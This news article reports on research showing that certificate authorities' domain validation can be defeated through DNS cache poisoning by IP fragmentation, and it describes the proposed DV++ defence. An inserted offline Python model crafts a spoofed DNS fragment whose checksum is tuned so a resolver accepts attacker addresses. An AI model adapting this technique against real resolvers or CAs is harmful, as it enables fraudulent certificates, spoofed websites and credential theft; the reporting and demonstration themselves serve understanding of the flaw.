
How to nab an HTTPS cert for a stranger's website: Step one, shatter those DNS queries...

Domain validation systems fooled by boffins

By Richard Chirgwin


Updated: Researchers in Germany have discovered how to obtain HTTPS security certificates for web domains they don't own, even when the issuing certificate authority relies on domain validation to check that the applicant controls the domain.

Essentially, some certificate authorities can be tricked into issuing cryptographic certs to the wrong party, meaning a miscreant can get an SSL/TLS certificate for someone else's domain and use it to stand up a malicious copy of that website. People lured into connecting to the faked site will be told by their browsers that the connection is secure, when really they're visiting a spoofed version.

Dr Haya Shulman of the Fraunhofer Institute for Secure Information Technology (SIT), one of the boffins behind the research, told The Register a "weak off-path attacker" (one who cannot see or intercept the traffic between the CA and the domain's nameservers) can, using nothing more than a laptop, effectively steal credentials, eavesdrop, or distribute malware using the method. The group at this stage withheld the names of the certificate authorities (CAs) that can be tricked into incorrectly issuing certs.

In a paper seen by The Register, to be presented at the ACM's Conference on Computer and Communications Security in Toronto, Canada, in October, Dr Shulman's team wrote:

The attack exploits DNS cache poisoning and tricks the CA into issuing fraudulent certificates for domains the attacker does not legitimately own – namely certificates binding the attacker's public key to a victim domain.

The group has asked The Register not to republish the paper because it names affected certificate authorities. We have, however, seen a demo of a live attack by Fraunhofer SIT's team. The technique ensures the DNS lookups the CA performs for domain validation are answered, in part, by the attacker's DNS server rather than by a server belonging to the domain's owner. The attacker's server then satisfies the validation checks, and the CA issues the cert for that domain to the attacker.

"The attack is initiated with a DNS request," the paper explained. "To succeed in the attack, the attacker has to craft a correct DNS response before the authentic response from the real nameserver arrives."

The attack depends on getting the nameserver's DNS response, which travels over UDP, broken into IP fragments, and then injecting a spoofed fragment so that the CA's resolver reassembles a response of the attacker's choosing and the CA hands the cert to the attacker. The first fragment of the genuine response carries the DNS header and the challenge-response fields a resolver checks, such as the transaction ID and the UDP source port, so those never have to be guessed. The injected fragment, which takes the place of the genuine one carrying the answer records, can be whatever the miscreant needs to steer the validation to his or her own server and complete the transaction.

Network admins will have worked out by now that the attacker needs to do some offline research to get this to work: they have to examine responses from the victim's nameserver to calculate "the offset where the fragmentation should occur," and the spoofed fragment has to be built so that the reassembled datagram still passes the UDP checksum carried in the genuine first fragment.
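To show why the resolver-side defences do not help once a response is fragmented, here is an added, pure-Python model of the mechanism described above. It is not code from the paper or from The Register, and it stops short of the IP layer: it does not force fragmentation or match IP identifiers, it simply splits a UDP datagram at an 8-byte-aligned offset the way IP reassembly would see it. The domain, addresses (RFC 5737 ranges), ports, transaction ID and offset are constructed for the demo, and using the second record's TTL as the field that absorbs the checksum difference is this example's own choice; the paper's exact fix-up technique is not described on this page.

```python
"""Constructed demo: a spoofed second IP fragment that keeps a DNS response's UDP checksum valid,
so a resolver's transaction-ID, port and checksum checks all pass. Pure Python, no network.
All names and addresses (RFC 5737 documentation ranges) are made up for the example."""
import struct

def encode_name(name):
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"

def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))

def build_dns_response(txid, qname, records):
    """Answer qname with A records given as (ttl, ipv4); RR names are a pointer to the question name."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(records), 0, 0)
    question = encode_name(qname) + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN
    answers = b"".join(struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + ip_bytes(ip)
                       for ttl, ip in records)
    return header + question + answers

def word_sum(data):
    """Raw sum of big-endian 16-bit words, the quantity the UDP checksum is built from."""
    if len(data) % 2:
        data += b"\x00"
    return sum(struct.unpack("!%dH" % (len(data) // 2), data))

def fold(total):
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total

def pseudo_header(src_ip, dst_ip, udp_len):
    return ip_bytes(src_ip) + ip_bytes(dst_ip) + struct.pack("!BBH", 0, 17, udp_len)

def build_udp(src_ip, dst_ip, sport, dport, payload):
    length = 8 + len(payload)
    body = struct.pack("!HHHH", sport, dport, length, 0) + payload
    csum = 0xFFFF ^ fold(word_sum(pseudo_header(src_ip, dst_ip, length) + body))
    return body[:6] + struct.pack("!H", csum or 0xFFFF) + body[8:]

def parse_answers(dns):
    qdcount, ancount = struct.unpack("!HH", dns[4:8])
    pos = 12
    for _ in range(qdcount):  # skip the question section (labels + QTYPE + QCLASS)
        while dns[pos]:
            pos += 1 + dns[pos]
        pos += 5
    out = []
    for _ in range(ancount):
        _, rtype, _, _, rdlen = struct.unpack("!HHHIH", dns[pos:pos + 12])
        rdata = dns[pos + 12:pos + 12 + rdlen]
        pos += 12 + rdlen
        if rtype == 1 and rdlen == 4:
            out.append(".".join(map(str, rdata)))
    return out

def resolver_accepts(src_ip, dst_ip, datagram, expected_sport, expected_txid):
    """Checks a classic resolver applies to a reassembled response: UDP length and checksum,
    ports, transaction ID. Returns the A records it would cache, or None if it drops the datagram."""
    length, = struct.unpack("!H", datagram[4:6])
    if length != len(datagram) or fold(word_sum(pseudo_header(src_ip, dst_ip, length) + datagram)) != 0xFFFF:
        return None
    sport, dport, txid = struct.unpack("!HH", datagram[:4]) + struct.unpack("!H", datagram[8:10])
    if sport != 53 or dport != expected_sport or txid != expected_txid:
        return None
    return parse_answers(datagram[8:])

def craft_spoofed_tail(genuine_tail, qname, attacker_ip, offset):
    """Attacker's replacement for the second fragment: same length as the genuine tail, two A records
    pointing at the attacker, and the low 16 bits of the second RR's TTL chosen so the 16-bit sum equals
    the genuine tail's. The UDP checksum in the genuine first fragment then still verifies after reassembly.
    The attacker learned the genuine tail by querying the nameserver earlier (the "offline research")."""
    spoofed = build_dns_response(0, qname, [(300, attacker_ip), (0, attacker_ip)])
    tail = bytearray((b"\x00" * 8 + spoofed)[offset:])  # TXID and ports sit in fragment 1, so dummies suffice
    ttl_lo = 48 + len(encode_name(qname)) - offset  # datagram offset of RR2's TTL low word, relative to the tail
    assert len(tail) == len(genuine_tail) and 0 <= ttl_lo and ttl_lo % 2 == 0  # even because offset % 8 == 0
    tail[ttl_lo:ttl_lo + 2] = struct.pack("!H", (word_sum(genuine_tail) - word_sum(bytes(tail))) % 0xFFFF)
    return bytes(tail)

def run_demo(offset=40):
    victim_ns, ca_resolver = "203.0.113.53", "198.51.100.2"  # constructed addresses
    qname, txid, sport, attacker_ip = "www.victim.example", 0x1F2E, 40123, "192.0.2.66"
    owner_ips = ["203.0.113.10", "203.0.113.11"]
    genuine = build_udp(victim_ns, ca_resolver, 53, sport,
                        build_dns_response(txid, qname, [(300, ip) for ip in owner_ips]))
    first, genuine_tail = genuine[:offset], genuine[offset:]  # the response as two IP fragments
    legit = resolver_accepts(victim_ns, ca_resolver, first + genuine_tail, sport, txid)
    # Spoofed tail with the attacker's records but no checksum correction: dropped on reassembly.
    naive_tail = (b"\x00" * 8 + build_dns_response(0, qname, [(300, attacker_ip)] * 2))[offset:]
    naive = resolver_accepts(victim_ns, ca_resolver, first + naive_tail, sport, txid)
    # Tuned tail: every check passes although the attacker never saw the TXID or the source port.
    tuned_tail = craft_spoofed_tail(genuine_tail, qname, attacker_ip, offset)
    poisoned = resolver_accepts(victim_ns, ca_resolver, first + tuned_tail, sport, txid)
    return legit, naive, poisoned

if __name__ == "__main__":
    print(run_demo())
```

Running it returns the owner's two addresses for the intact response, None for the naively spoofed fragment (the UDP checksum no longer verifies), and the attacker's address twice for the tuned fragment. In the real attack, that poisoned record is what steers the CA's validation lookups to a nameserver the attacker controls; the transaction ID, source port and question section were all supplied by the victim's own first fragment.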

The research team proposed a domain validation protocol they dubbed "DV++" to block the attack. In summary, DV++ uses a distributed model in which the validation queries are sent from multiple certification agents, so poisoning the single resolver a CA uses today is no longer enough.

"To pass a DV++ validation, domain owners must prove their ownership to a majority of the agents in a fully automated manner by responding to queries sent by the agents for the resource records in the domain."

Dr Shulman's collaborators in the project are Markus Brandt, Tianxiang Dai, Amit Klein and Michael Waidner. ®

Editor's note: This article was revised after publication to clarify that it is the websites being spoofed, not the certificates. The certs are handed over to the wrong person, in effect, and used to spoof legit sites.
